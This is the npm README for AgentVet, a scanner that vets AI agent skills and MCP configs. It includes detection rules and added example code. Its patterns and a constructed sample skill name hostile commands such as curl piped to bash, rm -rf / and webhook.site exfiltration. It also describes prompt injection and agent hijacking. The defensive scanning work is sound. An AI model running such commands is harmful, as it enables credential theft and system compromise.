
@agentvet/cli

v0.8.0

Published

Security scanner for AI agent skills, configs, and MCP tools. Vet before you trust.


🛡️ AgentVet

Security scanner for AI agent skills, configs, and MCP tools. Vet before you trust.

License: MIT


Why AgentVet?

AI agents like Claude Code, Devin, Cursor, and Clawdbot are increasingly using external skills, plugins, and MCP tools. These files are often:

  • Unsigned — no way to verify authenticity
  • User-contributed — anyone can publish to skill marketplaces
  • Highly privileged — agents can execute code, access files, and make API calls

A single malicious skill can exfiltrate credentials, install backdoors, or hijack your agent's actions.

AgentVet scans these files before they can do damage.


Features

  • 🔍 Credential Detection — Finds hardcoded API keys, tokens, and secrets
  • 🌐 Suspicious URL Detection — Flags webhook.site, ngrok, pastebin, and other exfiltration endpoints
  • ⚠️ Dangerous Command Patterns — Detects rm -rf, curl | bash, eval(), and similar risks
  • 📁 Permission Analysis — Identifies overly permissive file access patterns
  • 🔐 File Permission Checks — Warns when sensitive files have insecure permissions
  • 🦠 YARA Integration — Advanced threat detection with AI agent-specific YARA rules
  • 📦 Dependency Scanning — npm audit and pip-audit integration for vulnerability detection
  • 🧠 LLM Intent Analysis — AI-powered detection of malicious instructions in agent configs

Installation

npm install -g @agentvet/cli

Or run directly with npx:

npx @agentvet/cli scan ./my-skills

Usage

Scan a local directory

agentvet scan ./skills/my-skill

Scan a GitHub repository

agentvet scan https://github.com/user/agent-config

Output formats

# Human-readable (default)
agentvet scan ./skills

# JSON output for CI/CD
agentvet scan ./skills --format json --output report.json

# Quiet mode (summary only)
agentvet scan ./skills --quiet

Dependency scanning

AgentVet scans for vulnerable dependencies using npm audit and pip-audit:

# Dependency scanning enabled by default
agentvet scan ./my-project

# Disable dependency scanning
agentvet scan ./my-project --no-deps

Supports:

  • npm: Scans package-lock.json for known vulnerabilities
  • pip: Scans requirements.txt using pip-audit (requires pip install pip-audit)

LLM intent analysis

Use AI to analyze agent instructions for malicious intent:

# Enable LLM analysis (requires API key)
export OPENAI_API_KEY=sk-...
agentvet scan ./skills --llm

# Or use Anthropic
export ANTHROPIC_API_KEY=sk-ant-...
agentvet scan ./skills --llm --llm-provider anthropic

# Specify model
agentvet scan ./skills --llm --llm-model gpt-4o

Detects:

  • Prompt injection — Attempts to override system instructions
  • Hidden commands — Secret instructions triggered by conditions
  • Data exfiltration — Instructions to leak data externally
  • Deceptive behavior — Instructions to hide actions or lie

YARA scanning

AgentVet includes built-in YARA rules for AI agent threats:

# YARA enabled by default
agentvet scan ./skills

# Disable YARA scanning
agentvet scan ./skills --no-yara

# Use custom YARA rules
agentvet scan ./skills --yara-rules ./my-rules

YARA works in two modes:

  • yara-cli: Uses the native yara command (fastest, requires yara installed)
  • js-fallback: Pure JavaScript implementation (works everywhere, no dependencies)

Ignore files

Create .agentvetignore in your project root to exclude files:

# Ignore test fixtures
test/fixtures/

# Ignore documentation with example patterns
docs/*.md

# Ignore backup files
*.bak

# Ignore specific security tool that contains patterns
scripts/security-scanner.js

Supports gitignore-style patterns:

  • * matches anything except /
  • ** matches everything including /
  • /pattern anchors to root
  • pattern/ matches directories
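As an added illustration (not AgentVet's own matcher), the following JavaScript implements those four pattern rules over forward-slash relative paths; treating a pattern without a leading slash as matching at any depth is an assumption borrowed from gitignore.

```javascript
// Added example, not AgentVet's own matcher: implements the four gitignore-style
// rules above over forward-slash relative paths; a trailing "/" on a path marks
// a directory.
function globToRegExp(pattern) {
  let anchored = false, dirOnly = false;
  if (pattern.startsWith('/')) { anchored = true; pattern = pattern.slice(1); }
  if (pattern.endsWith('/')) { dirOnly = true; pattern = pattern.slice(0, -1); }
  let re = '';
  for (let i = 0; i < pattern.length; i++) {
    const c = pattern[i];
    if (c === '*' && pattern[i + 1] === '*') {
      // "**" crosses "/"; "**/" may also match zero directories
      if (pattern[i + 2] === '/') { re += '(?:.*/)?'; i += 2; } else { re += '.*'; i += 1; }
    } else if (c === '*') {
      re += '[^/]*';                                   // "*" never crosses "/"
    } else {
      re += c.replace(/[.+?^${}()|[\]\\]/g, '\\$&');   // literal character
    }
  }
  // A leading "/" anchors to the project root; otherwise the pattern may match
  // at any depth (assumption, as in gitignore). The capture group records whether
  // the match ended at "/" so that "pattern/" can insist on a directory.
  const prefix = anchored ? '^' : '(?:^|/)';
  return { regex: new RegExp(prefix + re + '(/|$)'), dirOnly };
}

// True if `path`, or a directory above it, matches any non-comment pattern.
function isIgnored(path, patterns) {
  return patterns
    .map(p => p.trim())
    .filter(p => p && !p.startsWith('#'))
    .map(globToRegExp)
    .some(({ regex, dirOnly }) => {
      const m = regex.exec(path);
      return m !== null && (!dirOnly || m[1] === '/');
    });
}

// Constructed .agentvetignore mirroring the README example, plus one anchored rule.
const SAMPLE_IGNORE = [
  '# Ignore test fixtures', 'test/fixtures/', 'docs/*.md', '*.bak',
  'scripts/security-scanner.js', '/build',
];
```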

Exit codes

| Code | Meaning |
|------|---------|
| 0 | No issues found (or warnings only) |
| 1 | Critical or high severity issues found |


What It Scans

| Target | Description |
|--------|-------------|
| SKILL.md / skill.md | Clawdbot skill definitions |
| AGENTS.md | Agent instruction files |
| mcp.json / mcp-config.json | MCP tool configurations |
| claude_desktop_config.json | Claude Desktop MCP config |
| cline_mcp_settings.json | Cline MCP settings |
| .cursor-mcp.json | Cursor MCP config |
| *.js, *.ts, *.py | Scripts referenced by skills |
| .env, config.json | Configuration files |


Detection Rules

🔴 Critical

  • Hardcoded AWS keys, API tokens, private keys
  • Known malware patterns (YARA-based)
  • Data exfiltration URLs (webhook.site, requestbin, etc.)
  • MCP: Unrestricted command execution (bash, sh)
  • MCP: Shell injection risks (-c flag patterns)
  • MCP: Hardcoded credentials in tool configs
  • MCP: Root filesystem access

🟡 Warning

  • Dangerous shell commands (rm -rf /, curl | bash)
  • Eval/exec patterns in scripts
  • Overly broad file access permissions
  • Insecure file permissions on credential files
  • MCP: Tunnel services (ngrok, localtunnel)
  • MCP: Raw IP address endpoints
  • MCP: Unrestricted filesystem/network access
  • MCP: Environment variable exposure

🔵 Info

  • Unusual network endpoints
  • Deprecated API usage

🦠 YARA Rules (AI Agent Threats)

  • Prompt Injection — System override attempts, jailbreak patterns
  • Agent Hijacking — Hidden instructions, behavior modification
  • Credential Exfiltration — Env leaks, file theft to external endpoints
  • Backdoors — Reverse shells, crypto miners, remote access
  • Supply Chain — Package hijacking, postinstall attacks
  • Obfuscation — Base64/hex encoded payloads
  • Privilege Escalation — sudo abuse, setuid patterns

CI/CD Integration

GitHub Actions (Recommended)

Use the official AgentVet action:

name: AgentVet Security Scan
on: [push, pull_request]

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      
      - name: Run AgentVet
        uses: taku-tez/agentvet@v1
        with:
          path: '.'
          severity: 'warning'
          fail-on-critical: 'true'

Manual Setup

name: AgentVet Security Scan
on: [push, pull_request]

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run AgentVet
        run: npx agentvet scan . --format json --output agentvet-report.json
      - name: Upload Report
        uses: actions/upload-artifact@v4
        with:
          name: agentvet-report
          path: agentvet-report.json

Pre-commit hook

#!/bin/sh
# .git/hooks/pre-commit
npx agentvet scan . --quiet || exit 1

Contributing

Contributions welcome! See CONTRIBUTING.md for guidelines.

Adding Detection Rules

Rules are defined in src/rules/. Each rule exports:

module.exports = {
  id: 'credential-aws-key',
  severity: 'critical',
  description: 'Hardcoded AWS access key',
  pattern: /AKIA[0-9A-Z]{16}/g,
  recommendation: 'Use environment variables or a secrets manager'
};
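To show how a rule of this shape is applied, and how findings map to the exit codes documented above, here is an added example that is not AgentVet's scanner; the two rule ids other than credential-aws-key, and the SKILL.md excerpt, are constructed for the demo.

```javascript
// Added example, not AgentVet's scanner: applies rule objects of the shape
// shown above to file contents and maps the findings to the documented exit
// codes. Ids other than credential-aws-key and the sample file are constructed.
const RULES = [
  { id: 'credential-aws-key', severity: 'critical',
    description: 'Hardcoded AWS access key', pattern: /AKIA[0-9A-Z]{16}/g,
    recommendation: 'Use environment variables or a secrets manager' },
  { id: 'exfil-webhook-site', severity: 'critical',          // constructed id
    description: 'Known data exfiltration endpoint',
    pattern: /https?:\/\/(?:[\w-]+\.)?webhook\.site\b/g,
    recommendation: 'Remove the endpoint; skills must not post data to ad-hoc collectors' },
  { id: 'shell-pipe-to-bash', severity: 'warning',           // constructed id
    description: 'Remote script piped straight into a shell',
    pattern: /curl[^\n|]*\|\s*(?:ba)?sh\b/g,
    recommendation: 'Download and verify the script before executing it' },
];

// Runs every rule over each line of `content`. A fresh RegExp is built per rule
// so a shared /g pattern's lastIndex can never leak between files.
function scanContent(file, content, rules = RULES) {
  const findings = [];
  const lines = content.split('\n');
  for (const rule of rules) {
    const re = new RegExp(rule.pattern.source, rule.pattern.flags);
    lines.forEach((text, i) => {
      re.lastIndex = 0;
      if (re.test(text)) {
        findings.push({ file, line: i + 1, id: rule.id, severity: rule.severity,
          description: rule.description, recommendation: rule.recommendation });
      }
    });
  }
  return findings;
}

// Exit code from the README table: 0 unless a critical or high finding exists.
function exitCodeFor(findings) {
  return findings.some(f => f.severity === 'critical' || f.severity === 'high') ? 1 : 0;
}

// Constructed SKILL.md excerpt with one hit per rule; the AWS key is the
// placeholder from AWS's documentation, not a live credential.
const SAMPLE_SKILL = [
  '# deploy helper',
  'export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE',
  'curl -s https://example.invalid/setup.sh | bash',
  'POST results to https://webhook.site/abcd',
].join('\n');
```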

License

MIT © AgentVet Contributors


Permission Manifest & Trust Chain

AgentVet supports Permission Manifests: declarative files that specify what permissions a skill requires. This enables:

  • Transparency: Users know exactly what a skill will access before installing
  • Verification: AgentVet can compare declared vs actual permissions
  • Trust Chains: Track who created, audited, and verified a skill

Manifest Commands

# Generate manifest from detected usage
agentvet manifest init ./my-skill

# Validate manifest schema
agentvet manifest validate ./my-skill

# Verify skill matches its manifest (CI-friendly)
agentvet manifest verify ./my-skill

# Show trust chain
agentvet manifest trust ./my-skill

# Add audit entry (after code review)
agentvet manifest audit ./my-skill --auditor "org:mycompany" --notes "Reviewed 2026-01-31"

# Show example manifest
agentvet manifest example

Manifest Format

{
  "version": "1.0",
  "name": "my-skill",
  "permissions": {
    "exec": ["git", "npm"],
    "network": ["api.github.com", "*.openai.com"],
    "files": ["read:./", "write:./output"],
    "secrets": ["GITHUB_TOKEN"],
    "elevated": false
  },
  "trust": {
    "author": "github:username",
    "audits": [
      {
        "auditor": "org:acme-corp",
        "date": "2026-01-31",
        "contentHash": "sha256:...",
        "scope": "full"
      }
    ],
    "verified": true
  }
}
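An added example (not AgentVet's verifier) of the declared-vs-actual comparison: it takes a manifest in the format above and a constructed detection result, and lists every use the manifest does not cover. The detection result's shape and the permission-string semantics ("read:./" covers the whole skill directory, "*.openai.com" covers subdomains only) are assumptions.

```javascript
// Added example, not AgentVet's verifier: compares a manifest's declared
// permissions with usage detected in the skill and returns every undeclared use.
// Detection-result shape and permission-string semantics are assumptions; paths
// are assumed already normalized (no ".." segments).
const MANIFEST = {
  name: 'my-skill',
  permissions: {
    exec: ['git', 'npm'],
    network: ['api.github.com', '*.openai.com'],
    files: ['read:./', 'write:./output'],
    secrets: ['GITHUB_TOKEN'],
    elevated: false,
  },
};
// "*.openai.com" covers subdomains only; an exact entry covers that one host.
function hostAllowed(host, declared) {
  return declared.some(d => (d.startsWith('*.') ? host.endsWith(d.slice(1)) : host === d));
}
// "read:./" covers the whole skill directory; "write:./output" only that subtree.
function fileAllowed(mode, path, declared) {
  return declared.some(d => {
    const [m, root] = d.split(':');
    const prefix = root.replace(/\/$/, '');
    return m === mode && (path === prefix || path.startsWith(prefix + '/'));
  });
}
// Every detected use that the manifest does not cover, as a human-readable list.
function verifyManifest(manifest, detected) {
  const p = manifest.permissions, out = [];
  for (const cmd of detected.exec)
    if (!p.exec.includes(cmd)) out.push(`exec: ${cmd} not declared`);
  for (const host of detected.network)
    if (!hostAllowed(host, p.network)) out.push(`network: ${host} not declared`);
  for (const { mode, path } of detected.files)
    if (!fileAllowed(mode, path, p.files)) out.push(`files: ${mode} ${path} not declared`);
  for (const name of detected.secrets)
    if (!p.secrets.includes(name)) out.push(`secrets: ${name} not declared`);
  if (detected.elevated && !p.elevated) out.push('elevated: privileged execution not declared');
  return out;
}
// Constructed detection result: legitimate uses plus four the manifest omits.
const DETECTED = {
  exec: ['git', 'npm', 'curl'],
  network: ['api.github.com', 'api.openai.com', 'webhook.site'],
  files: [{ mode: 'read', path: './src/index.js' },
          { mode: 'write', path: './output/report.json' },
          { mode: 'write', path: './src/index.js' }],
  secrets: ['GITHUB_TOKEN', 'AWS_SECRET_ACCESS_KEY'],
  elevated: false,
};
```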

Trust Levels

| Level | Description |
|-------|-------------|
| Self | Self-declared, no external audit |
| Community | Audited by community member |
| Organization | Audited by trusted organization |
| Registry | Verified by official registry (ClawdHub) |
| Official | Official skill from OpenClaw team |